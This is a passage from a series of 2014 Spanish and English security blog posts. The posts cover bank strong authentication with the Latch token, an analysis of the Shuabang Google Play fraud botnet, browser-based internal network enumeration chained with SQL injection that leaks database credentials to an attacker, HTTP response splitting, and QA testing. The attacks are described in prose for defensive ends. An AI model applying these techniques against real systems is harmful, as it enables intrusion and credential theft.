Hoy en día, las entidades bancarias que ofrecen sus productos y servicios por internet usan diferentes técnicas de autenticación (para identificar a sus clientes) y autorización (para llevar a cabo distintas operaciones). Ya quedaron atrás modelos de autenticación de un único factor, dando paso al proceso de autenticación fuerte, que requiere de la combinación de dos o más elementos. Estos elementos se suelen categorizar como: Conocimiento: Algo que el usuario conoce, como una contraseña o un código PIN. Posesión: Algo que el usuario tiene, como un token, smartcard, o teléfono móvil/SIM. Inherencia: Algo que el usuario es, o sea, una característica biométrica como la huella digital. Habitualmente el sector bancario utiliza un modelo de autenticación basado en riesgo, utilizando generalmente dos de estos niveles para permitir el acceso a sus servicios online: Lamentablemente, la falta de usabilidad de algunos métodos de autenticación provoca malas prácticas, y bajo esas circunstancias, paradójicamente el aplicar mayor seguridad resulta ser contraproducente (por ejemplo, cuando por no disponer de la tarjeta de coordenadas del banco cuando se necesita, el usuario opta por escanearla o fotocopiarla). Es curioso, pero el concepto de autenticación fuerte no ha tenido una definición oficial hasta que el European Forum on the Security of Retail Payments, SecuRe Pay, publicó en enero de 2013 una guía exhaustiva con recomendaciones para la lucha y prevención del fraude en medios de pago. En ella se definían, entre otros, los criterios mínimos que deben cumplirse en un proceso de autenticación fuerte. Su implementación debe llevarse a cabo antes del 1 de febrero de 2015, según indicaciones del Banco Central Europeo . El Banco central Europeo resalta la necesidad de que el inicio de los pagos en internet así como el acceso a datos relativos al pago sean protegidos con autenticación fuerte. Analicemos si los mecanismos más habituales implementados por la banca y medios de pago cumplen los criterios mínimos establecidos: A la vista de la gráfica comparativa anterior, podemos concluir que la tarjeta de coordenadas como elemento que prueba la autenticidad del usuario ha quedado obsoleta, y sin embargo, es uno de los más extendidos en la banca online. Teniendo en cuenta las indicaciones del Banco Central Europeo al respecto, las Entidades Financieras que actualmente trabajen con tarjeta de coordenadas deberán evolucionar a otros modelos. ¿Cuál es la mejor alternativa en este caso? De entre las diferentes soluciones de OTP, el token software tiene mejor ratio coste-beneficio: Cumple con las indicaciones del BCE. Reduce el coste eliminando el pago de SMS o la necesidad de la compra de HW (tokens) así como de su mantenimiento Tiene en cuenta la usabilidad, aprovechando la generalización del uso de los smartphones conectados a internet Acelera la implementación al eliminar la necesidad de desplegar elementos físicos (tokens e infraestructura) Ofrece mejores características de seguridad frente al SMS gracias a la implementación criptográfica y la posible utilización de contenedores seguros de los smartphones Latch como alternativa a las tarjetas de coordenadas Siguiendo con el análisis, y centrados ya en el OTP software como la mejor alternativa para sustituir a la tarjeta de coordenadas, la siguiente cuestión que se nos plantea es ¿qué solución OTP software debería escoger? Para responder a esta pregunta proponemos hacer una comparativa de los diferentes tipos de soluciones OTP software con los ámbitos que el BCE identifica como claves a la hora de establecer mecanismos de autenticación fuerte: Como vemos, Latch nos ofrece no sólo las capacidades de un segundo factor de autenticación token push sino que al mismo tiempo enriquece la seguridad actuando en los principales ámbitos destacados como clave por el BCE: A) Latch como autenticación fuerte: Latch no sólo limita la exposición de los procesos de autenticación, sino que además provee de protección con autenticación fuerte el inicio de cualquier proceso considerado crítico gracias al segundo factor de autenticación que incorpora Latch (token software). Este token es generado por el servicio Latch, y enviado sobre SSL a la aplicación del usuario y banco o entidad financiera, haciendo uso así de un canal independiente (out-of-band). El token es recibido por el usuario a través de su aplicación móvil (token push), disponiendo así de un código de un solo uso de 6 caracteres cuya validez temporal será la definida por el banco (por ejemplo, 60 segundos) B) Latch para fijar límites temporales a la validez de la autenticación: El servicio Latch ofrece también la posibilidad de fijar límites temporales al proceso de autorización, programando por ejemplo el bloqueo automático de ciertas operaciones transcurrido un tiempo desde su acceso, o bien fijando una franja horaria (por ejemplo, por la noche). C) Latch para la detección temprana: Las entidades financieras y medios de pago han sido pioneras en el uso de herramientas de análisis de fraude, trabajando en la identificación de patrones fraudulentos y en el análisis del contexto para identificar riesgos. Sin embargo, la incorporación de Latch como complemento a estos sistemas permite aportar una perspectiva única a la hora de llevar a cabo una detección temprana en los casos de suplantación de identidad como resultado del robo y uso de credenciales: Detección: el usuario será alertado a través de la aplicación móvil en el proceso de autenticación/autorización en el que el banco haya implementado Latch, ya sea él quien haya iniciado el proceso o bien un tercero intentando suplantar su identidad. Prevención: Latch posibilita el bloqueo de las cuentas digitales del usuario cuando no las esté utilizando, evitando así usos no autorizados. Bloqueo: la aplicación móvil notificará al usuario de cualquier intento de acceso a los sistemas del banco utilizando su identidad, permitiendo así al banco realizar un bloqueo temprano en los casos en los que exista un uso fraudulento de las credenciales de sus usuarios. D) Latch para la protección en múltiples capas: La filosofía de Latch es simple: si mantenemos bloqueadas nuestras cuentas o servicios digitales mientras no los utilizamos reduciremos el riego de un uso fraudulento o no autorizado de los mismos. Por ejemplo, podríamos bloquear el inicio de sesión a la banca online, los pagos con tarjetas de crédito, o el proceso de autorización de transferencias bancarias (cualquier operación sobre la cual queramos aplicar este control). Latch ofrece por lo tanto una capa adicional para mejorar la seguridad global reduciendo el tiempo de exposición de las operaciones: No supone una alternativa a los procesos y sistemas actuales de autorización que tenga el banco, y es totalmente independiente del esquema de autenticación que este emplee. No necesita conocer información alguna sobre los usuarios del banco: durante el proceso de autenticación del usuario se utilizan las API y los SDKs de Latch para consultar el estado actual de la cuenta del usuario pero no se intercambia ninguna información sobre el usuario del servicio. E) Latch como herramienta que ofrece control al usuario sobre su seguridad Al proporcionar a los usuarios el control sobre sus servicios (pagos con tarjetas o transferencias bancarias), existe una clara mejora en su percepción de la seguridad: Latch les informará de los intentos de acceso utilizando su identidad digital Los propios usuarios podrán definir la disponibilidad de sus servicios, por ejemplo indicando que en ciertos intervalos temporales (como por ejemplo por la noche) el acceso debe estar bloqueado. Por concluir, vemos como la sustitución de la tarjeta de coordenadas por el token de Latch ofrece múltiples beneficios: Cumplimiento de normativa: ofreciendo un modelo de autenticación fuerte que cumple la nueva normativa del BCE. Control del gasto: sin ser necesario realizar inversión en infraestructura y permitiendo el control del gasto desde el principio (licenciamiento por usuarios activos). Concienciación: se mejora la experiencia de usuario a la vez que se le hace partícipe de la seguridad. Seguridad adicional: además de autenticación fuerte, Latch ofrece una capa de seguridad adicional, monitorización ágil e involucración del usuario. Dentro del plazo límite: la implantación de Latch es rápida y sencilla, lo cual permitiría a los Bancos cumplir con la normativa del BCE dentro del plazo límite (15 de febrero de 2015). Irene Gómez irene.gomez@11paths.com
28 de noviembre de 2014
Shuabang botnet: BlackHat App Store Optimization (BlackASO) in Google Play
ElevenPaths has detected malicious apps in Google Play (already removed by Google) , aimed at performing Shuabang techniques, or BlackASO (Black Hat App Store Optimization). These malicious apps link fake accounts with the real device of the victim, getting very "real" accounts. With these accounts, the attacker sends tasks to the victims so they download apps (although not effective on the victim's device). The victim's account remains safe, but not the data about the phone. We describe in this report the details of this interesting attack. Shuabang Shuabang techniques, or BlackASO (Black Hat App Store Optimization). This is a real industry in China that has been active for years. The method consists in creating an infrastructure to score or artificially inflate the number of downloads of an app so they rise up their position on the markets. This infrastructure requires fundamentally Google or iOS accounts so they can distort actions, as if they were generated by real users. This "service" is usually sold to a third party intermediary (companies) that claim to enhance and optimize positions in any market but they do not really care about the methods to achieve it. To carry out the fraudulent scheme, the attacker needs active Google accounts associated with real devices that do not appear suspicious to Google, which would quickly eliminate them otherwise. Different techniques are used for this purpose. The most usual is to manually hire users that will create accounts in the market and rate apps they are told to. On this particular occasion, they came up with a system that starting from a set of fake Google accounts, distributes and associates them to different devices, so they take full advantage of the number of phones associated with an account. Besides, it allows sending tasks to the device so it simulates downloading apps under fake accounts. The potential of these malicious apps spotted for Shuabang is above average, since it demonstrates in-depth knowledge of the specific operation of Google's authentication protocols. Before getting into the details, let's see how Google accounts work. How Google accounts work When a user creates a Google account, once the username and password are provided, he has access to dozens of Google services, as a Single Sign On. Google account working schema The user enters the account password in the device only once. From that point on, he is registered in a Google service (for example Google Play, sending user, password, device ID...) that will return a token. This master token is stored in the device account manager (that remains associated) and will be used from then on in the device (that remains associated to it) so the password does not have to be entered again. Other temporary tokens are derived from this master token. It is common for users to have several devices registered with the same account. This, for example, allows users to choose where to install apps. For linking or associating a device to an account, the usual process is: Registering and associating and account with a device Either creating the account from the device itself. Google prevents automatic creation of fraudulent accounts by discarding accounts created on devices that are not "real", as well as inserting a CAPTCHA. Or using an existing Google account and signing in with it on the device that it is to be associated with. This process only requires entering the username and password in the phone to add a new account. What Google does, is associating a device identifier with the account. The Android phone or device will appear as a device associated with the account on the Google Play settings panel. This low-level registration and association protocol has been studied by the community and specially by attackers who carry out fraudulent practices. Registration and association can currently be programmed with raw calls to Google services and providing the necessary information. This process isn't officially documented, though. This kind of botnet is a sophisticated system by which attackers use apps with minimum privileges to associate accounts created by them to real devices. Thus, attackers obtain a number of fake accounts associated with "real" phones and therefore valid for Google services, allowing them to carry out a variety of fraudulent schemes. Specifically, artificially increase app downloads or fraudulent app rating. The attack The attacker had a pool of 12.500 Google accounts, created with valid username and passwords, but not registered with any device. The vast majority of accounts in this database were created by the attacker, and were delivered to the victims to register them with their devices. Brief attack scheme Fundamentally, the attacker gets the victim to make two actions: Associate accounts to devices in an automatic way so he can get tokens. Use these tokens in a distributed way, so downloads may be simulated. Real example of a response to an infected device, getting an account that will be associated to the device The applications turn the device into a zombie that collected these fake accounts from the central server every 10 minutes and associated them with the information on the victim's phone. The "original" Google account on the victim's device remains safe and the attacker cannot access it at any time. Each account was associated with between 10 and 30 physical phones of victims. The combinations between Google accounts and associated phones are countless. The image shows an example of an attacker account associated with 18 victim devices. Example of an account associated with different victims' devices The attacker published more than 300 applications on Google Play throughout the month of October. They were disguised as games, jokes, wallpapers and general entertainment. Of these, approximately 100 committed the fraud by associating these fake accounts to the device's settings and identifier. The remaining 200, although harmless in their first version, were usually later updated to commit the fraud. The permissions the apps requested are: Permissions requested by the apps infecting the users With this attack scheme, the attacker has obtained a database of 60,000 tokens. The attack was focused on victims in Brazil, India and Russia, although it was prepared to add any other country. The complete attack scheme is this: General scheme of the attack Conclusions Although the attacker seems to have a known ultimate goal (black ASO), he achieved several interesting milestones by developing these malicious apps: He created or bought 12,567 Google accounts, most of which were automatically created. Account creation requires breaking a CAPTCHA. He achieved a low level understanding of the Google registration and device to account association process. He was able to program them to work automatically. This is not officially documented and there is very little documentation about this. He was able to introduce some 100 malicious apps in Google Play with apparently harmless permissions. He was able to manage a task system that fully optimized the activity of the infected network by distributing download and account association tasks, etc. He was able to use the victims' devices features to associate them with accounts and thus perpetrate the fraud, as if a fake user was registered in the victim's device. Although the victim's account data is not affected, these malicious apps imply taking advantage of resources and violating privacy. Although the S huabang technique has been known and developed for some time via a variety of apps, the attackers' target is usually Google Play as an area for privileged distribution. This is the market that poses the most problems for publishing, but once they get it, and thanks to this intelligent technique described, the success for the attacker is remarkable. These malicious apps seem to be in a development phase, and it seems they were experimenting with these techniques. A complete report in PDF format is available from here. ElevenPaths has been able to determine how, since when and by which methods the fraud was committed and also established links between this attacker and other groups of attackers aside from gathering a series of incriminating evidence. Based on these correlations, ElevenPaths was able to find Google Play developer accounts possibly belonging to the same group of attackers. All of which was possible thanks to the use of Path5, a product developed by ElevenPaths, which allows early detection, investigation and correlation of any type of information about Android applications, among other functionalities.This report is a real-life example of the power and effectiveness of a product such as Path5 to investigate similar cases. Sergio de los Santos ssantos@11paths.com @ssantosv
25 de noviembre de 2014
Shuabang botnet: BlackHat App Store Optimization (BlackASO) en Google Play
ElevenPaths ha detectado apps maliciosas alojadas en Google Play (que ya han sido retiradas por la propia Google), destinadas en un principio posiblemente al Shuabang, o BlackASO (Black Hat App Store Optimization). Las apps maliciosas vinculaban cuentas falsas con el dispositivo real de la víctima, consiguiendo así cuentas muy creíbles. Con estas cuentas, el atacante enviaba tareas a las víctimas para que descargasen nuevas aplicaciones (aunque no se hacían efectivas en el dispositivo de la víctima). La cuenta del usuario permanece a salvo, no así sus datos personales sobre el teléfono. Describimos en el siguiente informe los detalles del curioso ataque. Shuabang El Shuabang o BlackASO (Black Hat App Store Optimization) es toda una industria en China, y desarrolla su actividad desde hace años. El objetivo del Shuabang es crear una infraestructura que permita valorar o inflar artificialmente las descargas de apps para posicionar mejor los programas en los mercados. La infraestructura precisa fundamentalmente cuentas de Google o iOS con las que falsear las acciones, de manera que parezcan que provienen de usuarios reales. Este "servicio" de posicionamiento se suele vender a terceros. En general, empresas que dicen dedicarse a mejorar el posicionamiento pero que se "abstraen" de los métodos empleados para conseguirlo. Para realizar este fraude, el atacante necesita principalmente cuentas de Google activas, asociadas a dispositivos reales, y que no parezcan sospechosas para Google, pues de lo contrario las eliminará rápidamente. Para ello, utilizan diferentes técnicas. La más habitual es la contratación manual de usuarios, que crearán cuentas en el market y valorarán las apps que se les pida. Con estas apps maliciosas, sin embargo, han ideado un sistema por el que, a partir de un conjunto de cuentas falsas, las distribuye y asocia a diferentes dispositivos, de forma que se reaprovecha y automatiza al máximo el número de teléfonos distintos asociados a una cuenta. Además, permite enviar tareas a los dispositivos para que, bajo las cuentas falsas, simulen la descarga de apps y así las posicionen más alto en los mercados. Estas apps detectadas para realizar Shuabang tienen un potencial por encima de la media, puesto que demuestran un profundo conocimiento del funcionamiento concreto de los protocolos de autenticación con Google. Antes de entrar en detalle, veamos cómo funcionan las cuentas en Google. Cómo funcionan las cuentas en Google Cuando un usuario crea una cuenta de Google, una vez ha introducido su usuario y contraseña, tiene acceso con ella a decenas de servicios en Google, como un Single Sign On. Esquema de funcionamiento de cuentas de Google El usuario introduce la contraseña de la cuenta una sola vez en el dispositivo. A partir de ahí, se da de alta en un servicio de Google (por ejemplo en Google Play, enviándole usuario, contraseña, ID de dispositivo...), que le devolverá un token. Este token maestro se almacena en el manejador de cuentas del dispositivo (que queda asociado) y será el que se utilice el resto de tiempo para que no se tenga que introducir la contraseña de nuevo. De él, se deducirán otros tokens temporales. Habitualmente, un usuario puede tener varios dispositivos registrados en una misma cuenta. De esta forma puede elegir dónde instalar apps, por ejemplo. Para asociar un dispositivo a una cuenta, el proceso habitual es: Registro de cuenta y asociación a dispositivo habitual Bien crear la cuenta desde el mismo dispositivo. Con el fin de que no se creen cuentas fraudulentas de forma automática, Google descarta las cuentas creadas sobre dispositivos que no sean "reales", además de interponer un CAPTCHA. O bien utilizar una cuenta de Google ya existente y presentarse en el mismo dispositivo con el que se quiere asociar. Para este proceso, tan solo es necesario introducir el usuario y contraseña de Google existente en el teléfono o añadir una nueva cuenta. Con esto, realmente, lo que se hará es asociar un identificador del dispositivo a la cuenta. El teléfono o dispositivo Android aparecerá como dispositivo asociado a la cuenta en el panel de configuración de Google Play. Este protocolo de registro y asociación a bajo nivel ha sido estudiado por la comunidad y en especial por los atacantes que realizan prácticas fraudulentas. Actualmente es posible conseguir el registro y la asociación programáticamente, realizando las llamadas a los servidores de Google y proporcionándole la información necesaria. El proceso no está documentado oficialmente. Esta especie de botnet es un sofisticado sistema por el que un atacante es capaz de, a través del malware con mínimos privilegios, asociar a dispositivos reales cuentas creadas por el propio atacante. Dispone así de un conjunto de cuentas falsas asociadas a teléfonos "reales" y por tanto, válidas de cara a los servicios de Google, lo que les permitirá cometer diferentes tipos de fraude. En concreto la descarga artificial o valoración fraudulenta de apps. El ataque El atacante disponía de 12.500 cuentas de Google ya creadas con usuario y contraseña, pero no registradas a ningún dispositivo. La inmensa mayoría de las cuentas en esa base de datos han sido creadas por el propio atacante, y se las proporcionaba a las víctimas infectadas para que las registrasen en su teléfono. Esquema de ataque resumido Fundamentalmente, lo que ha conseguido es que sus víctimas realicen dos acciones: Asociar cuentas a dispositivos de forma automática y así conseguir tokens. Utilizar esos tokens de forma distribuida para simular descargas. Ejemplo real de envío de una cuenta a un dispositivo infectado con el que será asociada La aplicaciones convierten al dispositivo en un zombi, que cada 10 minutos recoge tareas que realizar, entre ellas, recoger esas cuentas falsas del servidor central y asociarlas a los datos del teléfono de la víctima. La cuenta de Google "original" en el dispositivo de la víctima permanece a salvo y el atacante no tiene acceso a ella en ningún momento. Cada cuenta es asociada a entre 10 y 30 dispositivos físicos de las víctimas. Las combinaciones entre cuentas de Google y asociación de dispositivos son innumerables. En la imagen se muestra un ejemplo de cuenta del atacante, asociada a 18 dispositivos reales en la India de las víctimas. Ejemplo de cuenta asociada a diferentes dispositivos de víctimas Desde principios de octubre hasta finales del mismo mes, el atacante ha subido a Google Play más de 300 aplicaciones disfrazadas de juegos, chistes, fondos de pantalla y entretenimiento en general. De ellas, aproximadamente 100, cometían el fraude asociando esas cuentas falsas a la configuración e identificador del dispositivo. Algunas de las 200 restantes, aunque inofensivas en una primera versión, eran más tarde actualizadas para cometer el fraude. Los permisos de las apps eran: Permisos de las apps que infectan a los usuarios Con este esquema de asociación de cuenta y dispositivo real, el atacante se ha podido hacer con una base de datos de 60.000 tokens. El ataque se ha centrado en víctimas de Brasil, India y Rusia, aunque está preparado para añadir cualquier país. El esquema completo de ataque era el siguiente: Esquema general del ataque Conclusiones El atacante, aunque con un fin último conocido (posicionamiento fraudulento) ha conseguido varios hitos interesantes con el desarrollo de estas apps maliciosas: Ha creado o comprado 12.567 cuentas de Google. La creación de cuentas requiere romper un CAPTCHA. Ha conseguido comprender a bajo nivel, cómo funciona el sistema de registro y asociación de dispositivos a cuentas, y lo ha programado para que se realice automáticamente. Esto no está documentado oficialmente y existen muy poca documentación en Internet al respecto. Ha conseguido introducir alrededor de 100 apps maliciosas en Google Play, con permisos aparentemente inocuos. Ha conseguido gestionar un sistema de tareas que optimiza al máximo la actividad de la red de infectados, repartiendo tareas de descarga, asociación de cuentas, etc. Ha conseguido que las características de teléfonos de las víctimas sirvan para que sean asociadas a cuentas, y así poder gestionar el fraude por clic de forma inteligente, como si un usuario falso se encontrara registrado en el teléfono de la víctima. Aunque los datos relativos a la cuenta de la víctima queden a salvo, esta app maliciosa supone un aprovechamiento de los recursos y una vulneración de la privacidad. Aunque es una técnica conocida y desarrollada desde hace tiempo a través de varias apps, los atacantes tienen como objetivo Google Play, como lugar de distribución privilegiado, pero con el que más problemas se encuentran a la hora de publicar. Una vez conseguido y gracias a lo inteligente de la técnica, el éxito es notable. La app se encuentra totalmente en desarrollo en estos momentos, y da la sensación de que ha experimentado con estas técnicas. Un informe completo de la amenaza en formato PDF está disponible desde esta dirección. ElevenPaths ha podido determinar cómo, desde cuándo y con qué métodos se ha cometido el fraude, además de establecer enlaces entre el atacante y otros grupos de atacantes y recopilar evidencias incriminatorias. Basadas en estas correlaciones, ElevenPaths ha podido encontrar cuentas de desarrolladores de Google Play que posiblemente pertenecen al mismo grupo de atacantes. Todo esto ha sido posible gracias a Path5, un producto desarrollado por ElevenPaths que permite realizar una detección temprana, investigación y correlación de cualquier tipo de información relativa a aplicaciones de Android, entre otras funcionalidades. Este reporte supone un ejemplo real de la potencia y efectividad de un producto como Path5 para investigar casos similares. Sergio de los Santos ssantos@11paths.com @ssantosv
25 de noviembre de 2014
Enumeración y explotación de recursos internos mediante Javascript/AJAX (y II)
Veamos la segunda parte de la entrada anterior en la que se describirán nuevos escenarios de explotación y un escenario de ataque. En ella, observamos que es factible identificar recursos internos en una red corporativa o doméstica si un usuario visita una página web determinada. El navegador de la víctima enviará la información detectada al atacante, típicamente vía JavaScript/AJAX. En resumen, enumeramos recursos internos desde el exterior saltando las medidas de seguridad perimetral, toda la información se fuga vía protocolo HTTP desde un usuario legítimo de una organización. Explotación y escenario de ataque Esta técnica tiene un gran potencial, no solo por el hecho de permitir la enumeración, sino sobre todo, por aprovechar la propia enumeración para realizar ataques de explotación desde el exterior utilizando el navegador web de la víctima que visita la página web "maliciosa". Existen muchos tipos de ataques posibles. A continuación se expone un ataque diferente al expuesto en la NoConName y que muestra la flexibilidad a la hora de atacar sistemas. Un usuario (víctima1) que utiliza navegador web Chrome (WebRTC) actualizado en su última versión, visita una página web (atacante). Este hecho desencadena la enumeración de direcciones IP vivas y la identificación de productos vulnerables a través de la identificación de rutas conocidas: Wordpress: wp-admin/images/w-logo-blue.png Moodle: /theme/standardwhite/favicon.ico … Se identificará en la red un CMS (víctima2) vulnerable a una inyección SQL. El atacante utilizará a la víctima1 para inyectar el "exploit" en la víctima2 y conseguir extraer las credenciales de la base de datos al exterior. La víctima2 comunicará la información a la víctima1 y esta al atacante (otras configuraciones son posibles). Esquema de ataque El exploit creado es muy sencillo. Consiste en la introducción en la página web visitada de un iframe con la inyección SQL y además una etiqueta HTML concreta que se concatenara con los resultados obtenidos de la base datos. Estos datos son leídos de la tabla "test" de una base de datos MySQL, que es accesible a través de una aplicación vulnerable a SQL y que simplificará la comunicación de estos datos al exterior. Ejemplo de exploit Nótese que se codifica en hexadecimal la etiqueta: Una vez ejecutada la inyección en la víctima2, la víctima1 tendrá en su iframe una etiqueta de tipo img por cada credencial (name, passwd) extraída de la base de datos. La ejecución de estas etiquetas permitirá el envío de las credenciales al atacante. Detalle del código JavaScript del exploit Conclusiones La técnica de enumeración basada en el comportamiento temporal o de carga de un navegador web cuando localiza recursos, puede ser utilizada en la actualidad con gran provecho. Especialmente reseñable es su funcionamiento en cualquier navegador actual en su última versión y la posibilidad de utilizar el propio navegador web como si de una herramienta más de pentesting se tratará, identificando recursos internos y facilitando la explotación de vulnerabilidades, como puede deducirse evitando medidas de seguridad perimetral clásicas. Hoy, el único remedio contra estos ataques es buscar mitigaciones en la configuración de los navegadores web (por defecto deshabilitadas), limitando la ejecución de código JavaScript/AJAX o definiendo políticas que limiten la acción de contenido cargado desde Internet. * Enumeración y explotación de recursos internos mediante Javascript/AJAX (I) Dr. Alfonso Muñoz alfonso.munoz@11paths.com @mindcrypt Ricardo Martín ricardo.martínz@11paths.com @ricardo090489
14 de noviembre de 2014
HTTP response splitting
También conocido como CRLF Injection Attack, HTTP response splitting es la técnica en la que un atacante se vale de la inyección de retornos de carro y de línea para alterar una respuesta HTTP y separarla en dos (de ahí su nombre). De esta forma puede incluir cualquier contenido en la segunda petición y poner en riesgo la seguridad y privacidad de los usuarios que visitan la web, así como pudiendo alterar la página. Típicamente, permite inyectar JavaScript. Funcionamiento de un HTTP response splitting El flujo de petición y respuesta HTTP habitual se muestra en el diagrama: Esquema simple de petición y respuesta HTTP El navegador inicia una petición (sea GET, POST o cualquiera de los otros verbos que usa HTTP) que se envía al servidor web. Este a su vez responde con un código de estado (2XX para éxito, 3XX para redirección, 4XX para error etc…) y el contenido de la respuesta, que habitualmente incluye el HTML de una web que será interpretada por el navegador del cliente. Las diferentes líneas de una petición GET, por ejemplo, se separan por un retorno de carro y otro de línea (%0d y %0a). Si se añaden artificialmente en la petición con la intención de añadir nuevos campos, o incluso una segunda petición construida desde cero por el atacante, se produce el ataque. Abajo se muestra un diagrama de este proceso, de un ejemplo lanzado contra un servidor vulnerable de prueba: Esquema de ataque HTTP response splitting En esta petición se ha modificado un parámetro GET y en él se ha introducido un retorno de carro (%0d) y uno de línea (%0a) seguidos de las nuevas líneas de cada campo (Un "Content-Type" y un código JavaScript) separadas a su vez por otro CRLF (%0d%0a). La petición que recibe el servidor quedaría así: La respuesta del servidor podría ser esta: Que es interpretada por el navegador del cliente de la siguiente forma: Las consecuencias para el cliente pueden variar, pero podrían ser peligrosas. Al fin y al cabo, el servidor en el que el cliente confía, está pidiendo al cliente que ejecute acciones no deseadas que han sido creadas por un atacante (el cliente previamente tendría que ser inducido a pulsar en un enlace de este tipo). Las consecuencias claras son las mismas que en un Cross Site Scripting "típico" no persistente. Faast incluye un plugin que evalúa, comprueba y alerta sobre la presencia de este tipo de vulnerabilidad. Juan Luis Sanz juanluis.sanz@11paths.com
11 de noviembre de 2014
QA: Pruebas para asegurar la calidad del producto software (II)
Para adentrarnos un poco más en las diferentes pruebas que tiene que (o debería) realizar un equipo de QA, vamos a clasificar las pruebas según determinados criterios y luego profundizaremos en su definición y características principales. La tarea de clasificar las distintas pruebas dependerá siempre de los diferentes enfoques que se pueden tener sobre el propósito del software desarrollado, así que vamos a presentar diferentes clasificaciones atendiendo a los criterios que se suelen tener en cuenta a la hora de realizar una evaluación de calidad. Según la metodología utilizada para verificar y conocer a fondo el funcionamiento de la aplicación disponemos de dos casos: Test basado en un guión de casos de prueba o comúnmente llamado Scripted Testing Test basado en pruebas exploratorias también llamado Exploratory Testing Según la accesibilidad que se tenga sobre los elementos del sistema a evaluar: Pruebas de Caja Blanca Pruebas de Caja Negra Pruebas de Caja Gris También podrían clasificarse según el nivel al que llega cada test, y en éste caso se hablaría de: Pruebas unitarias Pruebas de integración Pruebas de sistema Y por último y no menos importante, si la clasificación se basa en la ejecución del producto también existe la siguiente clasificación: Pruebas funcionales: En estos casos se lanza la ejecución de la aplicación para evaluar las diferentes características del software. En estas pruebas se busca si la solución satisface las necesidades por la que fue creada, si es compatible entre versiones, si realiza el funcionamiento esperado para un grupo de personas, etc. Según las pruebas (más o menos ligeras), podríamos hablar de "pruebas de humo", de regresión, pruebas de aceptación, de compatibilidad, de uso a primer nivel o "Alpha testing", pruebas de uso en pre-producción o "Beta testing".. Pruebas no funcionales: en este caso se tratan de pruebas totalmente complementarias a las anteriores, ya que no es necesario la evaluación del funcionamiento de la aplicación sino verificar diferentes aspectos de ella. En este conjunto entrarían pruebas de seguridad, de usabilidad, de rendimiento, de internacionalización y localización, pruebas de escalabilidad, de mantenimiento, de instalación, de portabilidad... Llegados a este punto vamos a ir definiendo uno a uno para que se puedan apreciar las similitudes y diferencias de cada tipo de test existente en la actualidad. Scripted Testing Cuando hablamos de un test basado en un guión de pruebas (Scripted Testing), nos referimos a un tipo de test cuyo enfoque puede ser entendido como "tradicional". En este escenario se realiza un proceso de creación de documentación relativo a las pruebas que se quieren realizar. El diseño de los casos de prueba se hace al inicio del proyecto, donde se tienen claramente definidos los aspectos que se desean alcanzar, y se van añadiendo casos de prueba en cada nueva fase de desarrollo, de forma que se utilizan los casos previamente definidos y se añaden otros nuevos según haya variado la aplicación con respecto a la fase anterior (nuevas características, soluciones a errores, optimización de recursos, etc.). Finalmente el guión de casos de prueba dará al tester los pasos a seguir para ejecutar la aplicación e interpretar los resultados obtenidos de las pruebas y completar un informe detallado que formará parte de la documentación para la siguiente fase. Si hablamos del ciclo de vida de un Scripted Test, podemos definir dos fases si tomamos en cuenta una visión temporal del proyecto: Diseño temprano de pruebas. Ejecución de las pruebas (en muchos casos, muy posterior al diseño). Sin embargo, tras esto se iniciaría un ciclo por cada fase de desarrollo del producto. Refactorización del conjunto de casos de prueba. Ejecución de las pruebas. Una característica principal es que el Scripted Testing se adapta a contextos poco variables y a situaciones donde se tenga un control estricto sobre los diferentes aspectos del proceso. Nuevas variables que revisar y verificar, o cualquier cúmulo de cambios, harían el control sobre las pruebas de la aplicación se complicara considerablemente y en consecuencia supondría realizar muchos cambios en el guión de pruebas. En la práctica, el equipo de QA elige un integrante al que llamaremos diseñador. Se encargará de crear los casos de prueba que debería dar como resultado un robusto conjunto. Otros integrantes (o solo uno, dependiendo del volumen de casos), realizarán la función de testers que serán los que busquen lo que el diseñador les diga bajo las condiciones de entorno que el diseñador les imponga. Es importante que el diseñador no realice funciones de tester ya que su aportación a la búsqueda de errores sería prácticamente nula respecto a las pruebas que él mismo ha pasado por alto. O lo que es lo mismo: los demás pueden encontrar errores para los que el diseñador no ha generado casos de prueba. Si pretendemos dar un ejemplo sobre esto, tendríamos que definir lo que es una Fábrica de Pruebas, puesto que en este entorno es el proyecto el que se adaptará al proceso de trabajo de la fábrica. En esta situación los proyectos se etiquetarán según sus características y se tratarán según la clasificación que les aplica. En este entorno existen plantillas con un conjunto de pruebas predefinidas y según el tipo de proyecto al que se le quiera aplicar, se aplica una plantilla u otra. Para desarrollar estas plantillas se presta atención a aspectos generales como: Los riesgos habituales en un determinado escenario. Previsión de errores, así como su ubicación, su tipología, etc. Posibilidad de aplicar la repetición de pruebas, que sería muy ventajoso. Valorar el uso de scripts automatizados (programación de algoritmos de prueba) Sobre esto, un aspecto que siempre debemos tener en cuenta es la capacidad de las personas a la hora de procesar información. Algunas personas pueden ver lo que otros no ven a simple vista, ya sea por falta de conocimientos o intereses. En contraposición, los ordenadores a su vez se centran únicamente en hacer lo que se les ha programado hacer, es decir, no posee suficiente inteligencia para descubrir errores que pueden estar en el mismo escenario en el que se está ejecutando, ya que solo observará lo que se ha diseñado que se observe. Pruebas exploratorias Las pruebas exploratorias o testing exploratorio es un estilo o enfoque a la hora de realizar una evaluación de calidad de un producto software en la que podríamos destacar su capacidad de retroalimentación. Donde aprender el funcionamiento de la aplicación, la labor de diseñar casos de prueba y ejecutarlas son etapas que van de forma conjunta durante casi toda la ejecución del test. Si quisiéramos decirlo de otra manera, sería un estilo de testing donde se da especial prioridad a la libertad del tester de optimizar continuamente la calidad de su banco de pruebas y la responsabilidad asociada para mantenerlo y realimentarlo según vaya realizándose el diseño o la realización de pruebas. Es decir, no se espera a que se complete un ciclo de desarrollo para regenerar el conjunto de pruebas, sino que el número de pruebas irán incrementando en función de cómo se vaya explorando la aplicación. Cuanto más se use la aplicación más casos de uso se nos ocurrirán y de esta manera tendremos un guion más robusto y podremos realizar un informe mucho más completo que el que conseguiríamos con un Scripted Testing Muchas personas que se dedican a las pruebas de calidad, consideran que el testing exploratorio tiene características comunes con la técnica de prueba de caja negra (hablaremos de ello más adelante), sin embargo, no queremos dar a entender el testing exploratorio como una técnica, sino más bien como una filosofía o enfoque donde la clave principal está en la responsabilidad y concentración del tester para gestionar tiempo y recursos en la búsqueda de mejorar constante y progresivamente su batería de pruebas sin necesidad de una nueva versión de la aplicación o características. Y es que el objetivo principal que se persigue, es aprender cómo funciona realmente la aplicación y ser capaz de responder a preguntas sobre cómo se comporta en determinadas circunstancias. Es por esto que la calidad del testing exploratorio depende de las habilidades del tester para desarrollar los casos de prueba iniciales y generar nuevos a la hora de encontrar errores. El tester configura, opera, observa y evalúa el producto y su comportamiento, investigando de forma crítica el resultado y reportando la información 